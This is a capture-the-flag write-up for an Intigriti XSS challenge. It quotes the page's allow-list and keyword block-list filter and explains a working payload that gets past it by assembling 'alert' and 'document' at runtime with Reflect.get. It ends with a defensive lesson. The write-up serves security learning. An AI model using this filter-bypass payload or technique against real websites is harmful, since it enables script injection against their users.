XSS Intigriti Challenge Solution

Sekharlee
May 30, 2023


Hello, readers! My name is Sekhar Poola, and I am a passionate security researcher and bug bounty hunter. With more than two years of experience in the field, I have dedicated myself to identifying vulnerabilities and contributing to the improvement of online security.

My journey into the world of cybersecurity began with a deep fascination for technology and a desire to protect others from potential threats. Over time, I honed my skills through continuous learning and hands-on experience, exploring various domains of cybersecurity such as web application security, network security, and penetration testing.

Throughout my career, I have actively participated in bug bounty programs, collaborating with organizations to identify and remediate security flaws in their systems. This hands-on experience has not only allowed me to enhance my technical expertise but has also provided valuable insights into real-world security challenges.

Challenge link: https://challenge-0523.intigriti.io/

The goal of the challenge is to execute alert(document.domain) on the challenge page.

Analyzing the page source, we find the following script:

(()=>{
  opener=null;
  name='';
  // The payload comes from the ?xss= query parameter (empty string if absent).
  const xss = new URL(location).searchParams.get("xss") || '';
  // Allow-list: only letters and the characters , ' + \ . ( ) may appear.
  const characters = /^[a-zA-Z,'+\\.()]+$/;
  // Block-list: any of these substrings (case-insensitive) rejects the input.
  const words =/alert|prompt|eval|setTimeout|setInterval|Function|location|open|document|script|url|HTML|Element|href|String|Object|Array|Number|atob|call|apply|replace|assign|on|write|import|navigator|navigation|fetch|Symbol|name|this|window|self|top|parent|globalThis|new|proto|construct|xss/i;
  if(xss.length<100 && characters.test(xss) && !words.test(xss)){
    // Input that passes all three checks becomes the body of a data: URL script.
    script = document.createElement('script');
    script.src='data:,'+xss;
    document.head.appendChild(script);
  }
  else{
    console.log("try harder");
  }
})()

From the code, the points to observe are:

  • The input is taken from the xss URL query parameter.
  • A character allow-list is applied: only the letters a-z and A-Z and the characters , ' + \ . ( ) are permitted. Digits are not allowed.
  • A keyword block-list is applied to the xss parameter (case-insensitive substring match).
  • The input must be shorter than 100 characters.
  • Input that passes is appended after "data:," in the src of a script element, which is then added to the head tag and executed.
  • If any of the above checks fails, "try harder" is printed to the console.

In simple terms, the xss data is reflected into the page as follows:

<script src="data:,<XSS-INPUT-DATA>"></script>

Because the block-list covers most of the common function and object names, we need to find another way to reach and call alert.

Basic concepts:

Reflect.get():
Usage:
Reflect.get(target, propertyKey)
target
The target object on which to get the property.
propertyKey
The name of the property to get.
In a browser, frames is the window object itself (window.frames === window), so it gives access to global properties without writing the blocked word window.

Explanation:

  1. Reflect.get(frames,'ale'+'rt'):
  • Reflect.get() is invoked with two arguments: frames and the property key 'ale'+'rt'.
  • The word alert is blocked, so it is built at runtime with string concatenation; the block-list regex only sees the source text and never the concatenated result.
  • Reflect.get(frames,'ale'+'rt') retrieves the property 'alert' from the frames object. Since frames is the window object, this is window.alert.

2. (Reflect.get(frames,'docu'+'ment').domain):

  • The same Reflect.get() function is used.
  • document is also blocked, so we use string concatenation again.
  • Reflect.get(frames,'docu'+'ment') retrieves the property 'document' from the frames object, which is the document object of the window.
  • .domain is then read from the retrieved document object. The domain property typically holds the domain name of the document's URL.

3. Combining the two parts:

  • The first part, Reflect.get(frames,'ale'+'rt'), retrieves the window.alert function.
  • The second part, (Reflect.get(frames,'docu'+'ment').domain), retrieves the domain property of the window's document object.
  • Finally, the retrieved window.alert function is called with the domain value as its argument, which is equivalent to executing alert(document.domain).

Solution:
Reflect.get(frames,'ale'+'rt')(Reflect.get(frames,'docu'+'ment').domain)
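The following is an added example (not part of the original write-up or the challenge code) that re-implements the three filter checks from the script above so the gap can be verified offline, and uses a constructed stand-in for the browser's frames object to show why runtime-built property names defeat a substring block-list.

```javascript
// Filter checks copied from the challenge script: length limit,
// character allow-list and case-insensitive keyword block-list.
const characters = /^[a-zA-Z,'+\\.()]+$/;
const words = /alert|prompt|eval|setTimeout|setInterval|Function|location|open|document|script|url|HTML|Element|href|String|Object|Array|Number|atob|call|apply|replace|assign|on|write|import|navigator|navigation|fetch|Symbol|name|this|window|self|top|parent|globalThis|new|proto|construct|xss/i;

// Returns true when the input would be accepted and loaded as a data: script.
function passesFilter(xss) {
  return xss.length < 100 && characters.test(xss) && !words.test(xss);
}

// Constructed stand-in for `frames` (which is === window in a browser).
// It records every alert() argument so the result can be inspected.
function makeFakeWindow(domain) {
  const calls = [];
  return {
    alert: (msg) => { calls.push(String(msg)); },
    document: { domain },
    calls,
  };
}

// The mechanism from the write-up: the property names are assembled at
// runtime, so the blocked words never appear in the text the regex inspects.
function resolveViaReflect(frames) {
  const fn = Reflect.get(frames, 'ale' + 'rt');
  const arg = Reflect.get(frames, 'docu' + 'ment').domain;
  fn(arg);
  return frames.calls;
}

// The solution payload from the write-up (72 characters, under the limit).
const payload =
  "Reflect.get(frames,'ale'+'rt')(Reflect.get(frames,'docu'+'ment').domain)";

// The direct form is rejected by the block-list; the Reflect form is accepted.
console.log(passesFilter("alert(document.domain)"), passesFilter(payload));
console.log(resolveViaReflect(makeFakeWindow("example.test")));
```

The lesson for defenders is that a substring block-list on source text cannot account for names constructed at runtime; the safe fix is not to load attacker-controlled text as script at all.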
